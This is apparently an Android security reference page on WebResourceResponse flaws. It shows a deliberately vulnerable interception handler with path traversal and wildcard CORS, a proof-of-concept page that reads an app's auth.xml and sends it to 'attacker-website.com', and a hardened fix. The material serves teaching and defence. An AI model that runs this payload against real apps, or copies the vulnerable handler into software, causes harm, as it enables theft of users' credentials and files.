
# WebResourceResponse Vulnerabilities

## WebResourceResponse overview

[WebResourceResponse](https://developer.android.com/reference/android/webkit/WebResourceResponse) is a class that allows an Android application to emulate the server within WebView by intercepting requests and returning arbitrary content (including a status code, content type, content encoding, headers and the response body) from the application's code itself without making any actual requests to the server.

## Security issues

### Access to arbitrary files

If you control the path of the returned file and have an XSS or the ability to open arbitrary links inside a WebView, you can gain access to arbitrary files via XHR requests.

For example, if there is the following `WebResourceResponse` implementation:

```java
import android.net.Uri;
import android.webkit.WebResourceRequest;
import android.webkit.WebResourceResponse;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.HashMap;
import java.util.Map;

WebView webView = findViewById(R.id.webView);
webView.setWebViewClient(new WebViewClient() {
    @Override
    public WebResourceResponse shouldInterceptRequest(WebView view, WebResourceRequest request) {
        Uri uri = request.getUrl();
        // Only the path prefix is checked; the request's host is never looked at
        if (uri.getPath().startsWith("/local_cache/")) {
            // getLastPathSegment() returns the percent-decoded segment, so "..%2F" becomes "../"
            // and the resulting File can point outside the cache directory
            File cacheFile = new File(getCacheDir(), uri.getLastPathSegment());
            if (cacheFile.exists()) {
                InputStream inputStream;
                try {
                    inputStream = new FileInputStream(cacheFile);
                } catch (IOException e) {
                    return null;
                }
                // Wildcard CORS lets any origin loaded in the WebView read the response
                Map<String, String> headers = new HashMap<>();
                headers.put("Access-Control-Allow-Origin", "*");
                return new WebResourceResponse("text/html", "utf-8", 200, "OK", headers, inputStream);
            }
        }
        return super.shouldInterceptRequest(view, request);
    }
});
```

The PoC for the attack may look like the following one:

```html
<!DOCTYPE html>
<html>
<head>
   <title>Evil page</title>
</head>
<body>
<script type="text/javascript">
   function theftFile(path, callback) {
     var oReq = new XMLHttpRequest();

     oReq.open("GET", "https://any.domain/local_cache/..%2F" + encodeURIComponent(path), true);
     oReq.onload = function(e) {
       callback(oReq.responseText);
     }
     oReq.onerror = function(e) {
       callback(null);
     }
     oReq.send();
   }

   theftFile("shared_prefs/auth.xml", function(contents) {
       location.href = "https://attacker-website.com/?data=" + encodeURIComponent(contents);
   });
</script>
</body>
</html>
```

In the above example, the attack is possible because `Uri.getLastPathSegment()` returns a decoded value, which is then used to build the file path in the `new File(getCacheDir(), uri.getLastPathSegment())` line: the encoded `..%2F` becomes `../` and escapes the cache directory.

Policies like CORS still apply inside a WebView, so cross-origin requests to `any.domain` would not be readable without the `Access-Control-Allow-Origin: *` header. However, this restriction does not affect the PoC: the `WebResourceResponse` implementation checks only the URL path, so you can replace `any.domain` with the current origin.
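A hardened version of the handler above, added here as an example (not code from the original page or from the referenced apps); it rejects decoded separators in the file name, verifies the canonical path stays inside the cache directory, drops the wildcard CORS header, and assumes `app.example.com` is the only origin the WebView should serve the virtual path for:

```java
import android.net.Uri;
import android.webkit.WebResourceRequest;
import android.webkit.WebResourceResponse;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.util.Collections;

// Assumed: the WebView is only meant to load content from this origin.
final String trustedHost = "app.example.com";
WebView webView = findViewById(R.id.webView);
webView.setWebViewClient(new WebViewClient() {
    @Override
    public WebResourceResponse shouldInterceptRequest(WebView view, WebResourceRequest request) {
        Uri uri = request.getUrl();
        String path = uri.getPath();
        // Handle the virtual path only on the expected origin; everything else goes to the network.
        if (!trustedHost.equals(uri.getHost()) || path == null || !path.startsWith("/local_cache/")) {
            return super.shouldInterceptRequest(view, request);
        }
        // getLastPathSegment() is already percent-decoded, so "..%2F" arrives as "../".
        // Reject anything that is not a plain file name before touching the file system.
        String name = uri.getLastPathSegment();
        if (name == null || name.isEmpty() || name.contains("/") || name.equals("..")) {
            return notFound();
        }
        try {
            File cacheDir = getCacheDir().getCanonicalFile();
            File cacheFile = new File(cacheDir, name).getCanonicalFile();
            // Defence in depth: the resolved path must stay inside the cache directory
            // (this also catches symlinks) and must be a regular file.
            if (!cacheFile.getPath().startsWith(cacheDir.getPath() + File.separator) || !cacheFile.isFile()) {
                return notFound();
            }
            // No Access-Control-Allow-Origin header: only the WebView's own origin can read this.
            return new WebResourceResponse("text/html", "utf-8", new FileInputStream(cacheFile));
        } catch (IOException e) {
            return notFound();
        }
    }

    // Answer bad names ourselves instead of letting them fall through to the network.
    private WebResourceResponse notFound() {
        return new WebResourceResponse("text/plain", "utf-8", 404, "Not Found",
                Collections.<String, String>emptyMap(), null);
    }
});
```

With this handler the PoC request for `/local_cache/..%2Fshared_prefs%2Fauth.xml` is rejected at the file-name check, and even a name that slipped past it could not resolve outside the cache directory.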

References:

* [Writeup: Amazon Shopping and Amazon India Online Shopping apps: Access arbitrary files owned by Amazon apps](https://blog.oversecured.com/Android-Exploring-vulnerabilities-in-WebResourceResponse/#an-overview-of-the-vulnerability-in-amazon%E2%80%99s-apps)

## References

* [Android: Exploring vulnerabilities in WebResourceResponse](https://blog.oversecured.com/Android-Exploring-vulnerabilities-in-WebResourceResponse/)
